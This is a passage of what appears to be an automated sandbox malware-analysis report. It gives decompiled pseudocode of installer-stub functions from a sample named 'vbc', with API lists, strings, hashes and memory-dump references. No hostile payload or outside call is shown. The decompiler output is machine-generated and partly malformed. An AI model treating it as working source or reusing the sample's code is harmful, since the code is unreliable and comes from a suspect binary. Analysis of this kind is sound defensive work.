0x00404550
0x00404556
0x0040455d
0x00404560
0x00404563
0x00404565
0x00404565
0x0040456d
0x00404573
0x00404573
0x0040457d
0x00404582
0x00404585
0x0040458a
0x0040458d
0x0040458d
0x0040459d
0x0040459d
0x00000000
0x004045a0

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044FA
GetSysColor.USER32 ref: 00404538
SetTextColor.GDI32(?,00000000), ref: 00404544
SetBkMode.GDI32(?,?), ref: 00404550
GetSysColor.USER32 ref: 00404563
SetBkColor.GDI32(?,?), ref: 00404573
DeleteObject.GDI32(?), ref: 0040458D
CreateBrushIndirect.GDI32(?), ref: 00404597

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040647A(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060EB( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040608D( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406461( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406101

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004067A1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067A1(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E60(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E16(L"*?|<>/\":", _t5))) == 0) {
							E00405FC5(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067a3
0x004067ac
0x004067c3
0x004067c3
0x004067ca
0x004067d6
0x004067d6
0x004067d9
0x004067dc
0x004067e1
0x004067e3
0x004067ec
0x004067f0
0x0040680d
0x00406815
0x00406815
0x0040681a
0x0040681c
0x0040681f
0x00406824
0x00406825
0x00406829
0x00406829
0x0040682a
0x00406831
0x00406833
0x0040683a
0x00000000
0x00000000
0x00406842
0x00406848
0x00000000
0x00000000
0x00000000
0x00406848
0x0040684d

APIs

CharNextW.USER32(?), ref: 00406804
CharNextW.USER32(?), ref: 00406813
CharNextW.USER32(?), ref: 00406818
CharPrevW.USER32(?,?), ref: 0040682B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004067A2
*?|<>/":, xrefs: 004067F3

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3083651966
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E31 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E31(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e3f
0x00404e4c
0x00404e52
0x00404e90
0x00404e90
0x00404e9f
0x00404ea6
0x00000000
0x00404ea8
0x00404e54
0x00404e63
0x00404e6b
0x00404e6e
0x00404e80
0x00404e86
0x00404e8d
0x00000000
0x00404e8d
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
GetMessagePos.USER32 ref: 00404E54
ScreenToClient.USER32(?,?), ref: 00404E6E
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6

Strings

f, xrefs: 00404E82

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x7936f8; // 0x4fcbb
					_t11 =  *0x79f704; // 0x4fcbf
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32 ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32 ref: 00402FFC
SetDlgItemTextW.USER32 ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58

Uniqueness

Uniqueness Score: -1.00%

Function 734F2655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E734F2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E734F12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M734F2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x734f407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x734f409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E734F1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x734f506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x734f506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x734f506c);
								goto L17;
							case 5:
								_push( *0x734f506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x734f5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E734F1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E734F1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x734f265f
0x734f2661
0x734f2665
0x734f2674
0x734f2678
0x734f267d
0x734f267d
0x734f2685
0x734f268c
0x734f2692
0x00000000
0x734f2699
0x00000000
0x00000000
0x734f26a1
0x734f26a5
0x734f26a8
0x734f26ac
0x734f26b3
0x734f26b7
0x734f26bd
0x734f26bf
0x734f26c1
0x734f26c1
0x734f26c8
0x00000000
0x00000000
0x734f26d1
0x00000000
0x00000000
0x734f26d8
0x734f26de
0x734f26e8
0x734f26ee
0x734f26f3
0x00000000
0x00000000
0x734f2714
0x00000000
0x00000000
0x734f26fa
0x734f2700
0x734f2701
0x734f2703
0x00000000
0x00000000
0x734f271c
0x734f271e
0x734f2724
0x734f272a
0x734f272a
0x00000000
0x00000000
0x734f2692
0x734f272d
0x734f272d
0x734f2732
0x734f2743
0x734f2743
0x734f2749
0x734f274e
0x734f2753
0x734f275f
0x734f2764
0x00000000
0x734f2769
0x734f2755
0x734f2756
0x734f276a
0x734f276a
0x734f2753
0x734f276b
0x734f276c
0x734f276f
0x734f2783

APIs

Part of subcall function 734F12BB: GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5

GlobalFree.KERNEL32(?), ref: 734F2743
GlobalFree.KERNEL32(00000000), ref: 734F2778

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 67e428c09d0736c4ddb173c34d18a591b72c0ecb6a2e3c3b6a7bf603a76ea03c
Instruction ID: d3a529518b3a09acee0658c5e45db5b2eba8755f844ca550f4f525dd77c009b3
Opcode Fuzzy Hash: 67e428c09d0736c4ddb173c34d18a591b72c0ecb6a2e3c3b6a7bf603a76ea03c
Instruction Fuzzy Hash: 8B31027A10810BEFD71EAF95C884F2A7BFAFB8530472C412CF105A32A0CB315825CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E60(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FE5(_t55);
				_t29 = E0040600A(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8a74;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034C2(_t49);
							E004034AC(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FC5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060BC( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
